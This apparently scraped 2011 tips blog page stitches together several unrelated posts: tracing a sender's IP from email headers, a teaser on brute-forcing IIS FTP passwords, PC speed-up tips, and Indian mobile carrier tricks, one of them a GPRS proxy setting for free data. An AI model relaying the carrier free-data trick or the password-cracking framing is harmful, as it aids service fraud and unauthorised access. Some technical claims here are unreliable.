Now close registry and restart yahoo messenger and try Multiple Login

How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is

65.119.112.245.
That is be the IP address of the sender!
5. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender

How to crack IIS FTP password using Brute-Force

FTP is an application or service or protocol  which can be used to transfer files from one place to another  place ,it really comes very handy  during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading  unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.

How to Increase Speed UP PC Computer Speed

Increase Speed UP PC Computer Speed

One of the most effective and useful tool to speed up the performance of your computer is to defragment your hard drive. Defragmentation of the hard drive is referred to rearranging the scattered files stored in your hard drive. Actually the data you store in your hard drive increases with the course of time. Then data becomes scattered in the hard drive and needs arrangement so that computer can easily access and run programs from the hard drive. If data is arranged with the help of defragmentation then computer easily access the data and thus requires less time to access and run the programs. Remember that the files stored on the hard drive are in fragmented form. These files are very hard for the computer to open and run. That is why computer supports the defragmentation tool because it helps a lot to let the computer open and run the files.

 You should defragment each volume of your hard drive so that your computer can access all volumes very easily. This easement of accessing the entire hard drive would really boost up the performance speed of your computer. There is another tool which can add to the efficiency of your computer. This tool is called rebooting the computer. Rebooting is the most essential tool which can enable your computer to run faster in terms of performance and speed. You should prefer using disk defragmenter and the proper rebooting of your computer. The combine application of both these tools will surely enable your computer to easily access any file in no time. You would enjoy the reliable and convenient usage of your computer through this way. You should keep one thing in mind that you should never use online solutions for boosting up the performance of your computer. This would cause more damage to your computer because it can contain virus and malware attack.

Stop Autoplay In USB Flash Drives By Pressing One Keyboard Button

Most of the virus enters the computer through USB Flash drives, when we open the drive through autoplay the viru is a simple tip with which you can stop autoplay in USB Flash drives. Not only flash drives, it also stops autoplay for CD and DVD also.


While inserting CD, DVD or any flash drive, simply press and hold the Shift key, this will disable the autoplay dialog box. Holding down the Shift key will also block the applications that starts automatically.
Works fine in Windows XP and Windows Vista, Just give it a try and drop your comments.

Tuesday, March 22, 2011

Call Airtel Customer Care For Free

Call Airtel customer care for free without deducting 50ps.

Dial 12161
Press: 2, 5#, 5

OR

Dial 198

Wednesday, March 16, 2011

Reliance GPRS Hack 2011

Change Your GPRS Profile To     


APN: smartwap
IP : 10.239.221.7
PORT: 8080
HOME: http://0.facebook.com.t9space.com

Note: keep your balance below 30ps

Tuesday, March 15, 2011

Vodafone Call Back Trick

Talk to your friend if you dont have balance.
 Requesting a call back by dialing *555*your friend vodafone number# (tollfree)

Monday, March 14, 2011

Tricks To Speed up Windows 7

 Tricks To Speed up windows 7

Tips And Tricks To Speed up windows 7 With the launch of windows 7 we have witnessed one of the fastest operating system by Microsoft.But still there are people who want more and more!.This article is for all those people who want to increase the performance/speed of their windows 7 operating system. We are not providing here any softwares for this purpose we are just giving you tips and tricks to tweak your windows 7 according to your needs and you will certainly get your desired performance from your windows 7 operating system.Here is the step by step tutorial with screenshots on how to increase your windows 7 speed .

1.Disable Startup Services
Windows startup services can be found by clicking on start and the and typing “ msconfig ” and pressing enter.Now click on services tab.Now you can disable the unwanted services by checking them and clicking on disable.While this should be done according to your requirements.Services like “Offline Files,” “Tablet PC Input Services,” Terminal Services,” “Fax” and “Windows Search. “Offline Files,” “Tablet PC Input Services,” Terminal Services,” “Fax” and “Windows Search have a large impact on windows 7 speed/performance.
2.Utilize Readyboast
Microsoft introduced readyboast service with the launch of windows vista and continued the service in windows 7.In ready boast service whenever you plugin your pendrive into your computer you will get an option to use your pendrive to speed up your windows 7 or windows vista.It will increase your windows memory.By using ready boast you can also specify how much memory of the pendrive should be used to speed up your windows 7.
3.Disable Windows transparency
Disabling the windows 7 transparency option will certainty give a good speed to your windows 7 speed/performance.Disabling transparency is very easy in windows 7.Simply right-click on your desktop, select “Personalize,” choose the active theme and then navigate to “Windows Color.” Finally, uncheck the “Enable Transparency” option.
4.Remove Unwanted Programs from Startup
Disabling unwanted programs such as messengers or other programs from startup will not only increase speed of your windows 7 it will also decrease the startup time of windows 7.
5.Disable Unwanted Features Of Windows 7
To disable unwanted features from windows 7 click on “ Start “ then on control panel.Now click on “ Programs “ then on “Turn Windows features on or off”.Now disable the features you think you dont want.We recommend you to disable the “ Indexing Service “ it will have a noticeable effect on the speed.
6.Defragment Your Windows Regularly
Adding and deleting files from drives will make your drives fragmented and it will take longer to access files so defragmenting the drive will decrease file access time.To start defragmentation click on “ Start “ and type “ Disk Defragmenter “ And press enter.Now start the defragmentation.

Tata Docomo Caller Tune Search For Free


Now song search made more easy! in docomo
 just type the song name and send an sms to 
 543211 (tollfree) and get the song of your choice. 


 You can also change or activate the caller tune by dialing *678#

Like The Post